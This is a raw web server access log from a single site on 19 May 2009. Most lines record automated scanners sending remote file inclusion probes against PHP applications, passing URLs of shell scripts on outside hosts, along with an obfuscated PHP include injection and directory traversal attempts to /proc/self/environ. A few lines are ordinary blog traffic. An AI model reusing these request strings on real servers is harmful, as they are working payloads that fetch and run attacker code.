211.206.122.138 - - [19/May/2009:09:59:55 -0700] "GET /logs/access_080331.log/config.php?path[docroot]=http://www.guiafem.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:10:00:00 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/gie.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:10:00:01 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/gie.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:10:00:01 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/gie.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:10:00:31 -0700] "GET /logs/access_090507.log/home.php?index=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:10:00:31 -0700] "GET /logs/home.php?index=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:10:00:31 -0700] "GET /home.php?index=http://pallmall8.fileave.com/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:10:00:36 -0700] "GET /logs/access_081125.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27voo.owned.lt%27.chr(47).%27sp%27.chr(47).%27tc.v%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:10:00:36 -0700] "GET /logs/access_081125.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27voo.owned.lt%27.chr(47).%27sp%27.chr(47).%27tc.v%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:01:02 -0700] "GET /logs/access_090120.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:01:02 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:01:03 -0700] "GET /logs/access_090119.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:10:01:03 -0700] "GET /logs/access_080919.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:10:01:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:01:04 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
69.248.128.84 - - [19/May/2009:10:01:04 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:01:18 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:10:01:20 -0700] "GET /logs/access_090506.log%20%20/home.php?index=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:10:01:20 -0700] "GET /home.php?index=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:10:01:20 -0700] "GET /logs/home.php?index=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:01:33 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:01:42 -0700] "GET /logs/access_080725.log/config.php?rootBase=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:01:42 -0700] "GET /logs/config.php?rootBase=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:01:42 -0700] "GET /config.php?rootBase=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:10:01:53 -0700] "GET /guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:10:01:53 -0700] "GET /logs/access_090315.log//guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:10:01:53 -0700] "GET /logs//guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:01:54 -0700] "GET /config.php?rootBase=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:01:54 -0700] "GET /logs/config.php?rootBase=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:01:54 -0700] "GET /logs/access_080725.log/config.php?rootBase=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:01:55 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:01:55 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:01:55 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:01:55 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:01:58 -0700] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 41994 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:02:03 -0700] "GET /logs/access_080725.log%20%20/config.php?rootBase=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:02:08 -0700] "GET /logs/access_080723.log%20%20/config.php?rootBase=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:10:02:09 -0700] "GET /logs/access_090126.log//guestbook1//admin.php?include_path=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:02:19 -0700] "GET /logs/access_080725.log%20%20/config.php?rootBase=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:10:02:25 -0700] "GET /logs/access_080723.log%20%20/config.php?rootBase=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:02:43 -0700] "GET /logs/index.php?screen=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:02:47 -0700] "GET /logs/access_081008.log%20%20/index.php?screen=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:02:50 -0700] "GET /logs/access_090214.log%20%20/index.php?screen=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:02:55 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:02:55 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:02:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:02:55 -0700] "GET /logs/access_080322.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:02:55 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:02:55 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:02:56 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:02:56 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:02:56 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:02:56 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:02:56 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [19/May/2009:10:02:56 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:10:02:59 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:02:59 -0700] "GET /logs/access_081009.log//?path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:02:59 -0700] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:02:59 -0700] "GET /logs//?path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 200 100196 "-" "libwww-perl/5.805" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:03:00 -0700] "GET /logs/access_081009.log//?path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:03:00 -0700] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:03:01 -0700] "GET /logs//?path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 200 100196 "-" "libwww-perl/5.805" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:10:03:10 -0700] "GET /logs/access_090403.log%20%20/home.php?index=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:10:03:14 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:03:25 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:03:25 -0700] "GET /logs/access_080614.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:03:25 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:10:03:29 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:10:03:30 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:03:36 -0700] "GET /logs/access_081116.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:03:41 -0700] "GET /logs/access_071223.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:03:41 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:03:41 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:03:42 -0700] "GET /logs/access_080521.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:03:43 -0700] "GET /index.php?screen=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 41973 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:10:03:44 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:10:03:48 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:04:03 -0700] "GET /guestbook1//admin.php?include_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:04:03 -0700] "GET /logs/access_090315.log//guestbook1//admin.php?include_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:04:03 -0700] "GET /logs//guestbook1//admin.php?include_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:04:07 -0700] "GET /logs/access_090126.log//guestbook1//admin.php?include_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:04:10 -0700] "GET /?path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 200 42082 "-" "libwww-perl/5.805" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:04:13 -0700] "GET /?path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 200 42010 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:04:24 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:04:24 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:04:25 -0700] "GET /logs/access_071223.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:04:29 -0700] "GET /logs/access_080521.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [19/May/2009:10:04:47 -0700] "GET /logs/access_090126.log%20%20//guestbook1//admin.php?include_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:04:51 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:04:51 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:04:51 -0700] "GET /logs/access_080614.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:04:58 -0700] "GET /logs/access_080918.log//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:04:58 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:04:58 -0700] "GET /logs//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.80.2 - - [19/May/2009:10:05:01 -0700] "GET /logs/access_081012.log//index.php?DOCUMENT_ROOT=http://ecology45.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.80.2 - - [19/May/2009:10:05:01 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://ecology45.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.80.2 - - [19/May/2009:10:05:01 -0700] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://ecology45.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.210.42 - - [19/May/2009:10:05:02 -0700] "GET /guestbook1//admin.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [19/May/2009:10:05:02 -0700] "GET /logs//guestbook1//admin.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [19/May/2009:10:05:02 -0700] "GET /logs/access_090315.log//guestbook1//admin.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:05:02 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
91.121.210.42 - - [19/May/2009:10:05:04 -0700] "GET /logs/access_090126.log//guestbook1//admin.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:05:06 -0700] "GET /logs/access_081116.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [19/May/2009:10:05:06 -0700] "GET /logs/access_090126.log//guestbook1//admin.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.15.242 - - [19/May/2009:10:05:07 -0700] "GET /logs/access_081009.log//?path%5Bdocroot%5D=http://www.tkcchoir.org/xml/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:10:05:11 -0700] "GET /logs/access_080925.log%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.15.242 - - [19/May/2009:10:05:12 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.tkcchoir.org/xml/pw.txt??? HTTP/1.1" 200 100196 "-" "libwww-perl/5.805" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:10:05:16 -0700] "GET /logs/access_080619.log%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:05:33 -0700] "GET /inc/header.php/step_one.php?server_inc=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:05:33 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:05:34 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:10:05:37 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:05:39 -0700] "GET /logs/access_081122.log//inc/header.php/step_one.php?server_inc=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.15.242 - - [19/May/2009:10:05:43 -0700] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://www.tkcchoir.org/xml/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:05:48 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:05:48 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:05:49 -0700] "GET /logs/access_081122.log%20%20//inc/header.php/step_one.php?server_inc=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.132.9.55 - - [19/May/2009:10:05:49 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:05:50 -0700] "GET /inc/header.php/step_one.php?server_inc=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:10:05:51 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
